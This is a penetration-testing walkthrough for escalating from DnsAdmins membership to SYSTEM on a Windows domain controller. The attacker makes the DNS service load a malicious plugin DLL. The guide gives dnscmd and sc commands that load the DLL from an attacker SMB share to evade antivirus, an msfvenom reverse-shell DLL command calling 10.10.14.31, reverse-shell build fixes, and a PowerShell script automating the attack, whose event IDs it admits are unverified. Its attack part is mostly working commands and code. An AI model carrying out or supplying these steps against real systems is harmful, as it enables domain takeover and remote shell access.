Malicious DLL Injection
## Overview
If a low-privileged user is a member of the DnsAdmins group, an attacker can point the DNS service at a malicious DLL (the `ServerLevelPluginDll` setting, written with `dnscmd /config /serverlevelplugindll`) and have it loaded into dns.exe on the next restart of the service. Because the DNS service runs as SYSTEM on a domain controller, this yields privilege escalation.
## Environment Setup and Requirements
- The low-privileged user must be a member of DnsAdmins
- The low-privileged user must be able to start and stop the DNS service (DnsAdmins membership alone does not grant this; without it the DLL is configured but not loaded until someone restarts DNS)
- A separate attacker Windows machine with Visual Studio for compiling the DLL
## Steps
- Download this DLL DNS plugin project and open it on the attacker Windows machine
- Get this reverse shell, update it with your IP/PORT settings, and put it under Sources. Make sure to add `#include "stdafx.h"` at the top.
- Create this header file
- Update the main code. The changes below create a new thread for the shell, which helps keep the DNS service from crashing while the payload runs.
- Switch the build configuration to Release and build
- The DLL should be generated at a path similar to this. Transfer it to the victim machine, or host it on an SMB share reachable from the victim.
- Start a netcat listener on the attacker machine, on the port configured in the reverse shell
- On the victim, configure the DNS service to load the DLL, verify the setting, and restart DNS to activate it. Here the DLL is loaded from the attacker's SMB share over a UNC path so it never has to be written to the victim's disk, which bypasses some AV. The share must be readable by the DNS server's machine account (SYSTEM accesses the network as the computer account), so an anonymously readable share is the usual choice.
```cmd
REM load: set the plugin DLL path (takes effect on next service start)
dnscmd /config /serverlevelplugindll \\10.10.14.31\share\Win32Project1.dll
REM verify: /info reads the current value instead of setting it again
dnscmd /info /serverlevelplugindll
REM stop dns
cmd /c sc stop dns
REM start dns: the DLL is loaded as SYSTEM during service start
cmd /c sc start dns
```
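The same load/verify/restart sequence driven from PowerShell, with the prerequisite and success checks a tester wants before pulling the trigger. This is an added example, not code from the original page or from the DLL plugin project it links to: the UNC path is the one used above and should be changed to yours, the `ServerLevelPluginDll` registry value under `DNS\Parameters` is where `dnscmd /config` stores the setting, and the DNS Server event IDs used in `Get-DnsPluginEvents` (150 for a plugin load failure, 770 for a successful load) are an assumption to confirm against your own DNS Server log.

```powershell
# Added example: wraps the dnscmd-based plugin load in checks.
# Assumptions: $PluginPath is an SMB share readable by the DC's machine account;
# event IDs 150/770 are from memory, confirm them in your environment.
param(
    [string]$PluginPath = '\\10.10.14.31\share\Win32Project1.dll'   # change to your share/DLL
)

$RegKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Test-DnsAdminsMember {
    # Check the current token's groups for DnsAdmins (DOMAIN\DnsAdmins).
    $groups = (whoami /groups /fo csv | ConvertFrom-Csv).'Group Name'
    return [bool]($groups -match '\\DnsAdmins$')
}

function Get-ServerLevelPluginDll {
    # Read the value dnscmd writes, instead of trusting dnscmd's own echo.
    (Get-ItemProperty -Path $RegKey -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
}

function Set-DnsPlugin {
    param([string]$Path)
    if (-not (Test-DnsAdminsMember)) { throw 'Current user is not a member of DnsAdmins.' }
    dnscmd /config /serverlevelplugindll $Path | Out-Null
    # /info shows the current setting; /config would only set it again.
    dnscmd /info /serverlevelplugindll
    $current = Get-ServerLevelPluginDll
    if ($current -ne $Path) { throw "ServerLevelPluginDll is '$current', expected '$Path'." }
}

function Restart-Dns {
    # DnsAdmins alone does not grant service control; this is where the second prerequisite bites.
    try {
        Restart-Service -Name DNS -Force -ErrorAction Stop
    } catch {
        throw "Could not restart DNS (need start/stop rights on the service): $($_.Exception.Message)"
    }
    Get-Service -Name DNS | Select-Object Name, Status
}

function Get-DnsPluginEvents {
    # Assumed IDs: 770 = plugin DLL loaded, 150 = plugin DLL failed to load.
    Get-WinEvent -FilterHashtable @{ LogName = 'DNS Server'; Id = 150, 770 } -MaxEvents 5 -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message
}

function Remove-DnsPlugin {
    # Cleanup after the engagement (requires admin rights on the DC): drop the value and restart.
    Remove-ItemProperty -Path $RegKey -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
    Restart-Dns
}

Set-DnsPlugin -Path $PluginPath
Restart-Dns
Get-DnsPluginEvents
```

Run it with the netcat listener already up; if `Restart-Dns` throws, the DLL is configured but will only load when someone with service-control rights restarts DNS. Defenders can reuse `Get-ServerLevelPluginDll`: on a healthy DNS server the value is absent, so any non-empty value, and especially a UNC path, is worth an alert.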
## Troubleshooting
- A DLL generated by msfvenom did not work in this setup; it appears to crash the DNS service, which is why the custom plugin DLL above runs the shell in its own thread.

```sh
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.31 LPORT=4444 -f dll > evil.dll
```
- If you encounter MFC errors during build, install the MFC libraries from Visual Studio Installer
- If you encounter the build error `revshell: must return a value`, add a return value at the end of rev.cpp:

```cpp
// [..redacted...]
    WSACleanup();
    return 0;
}
```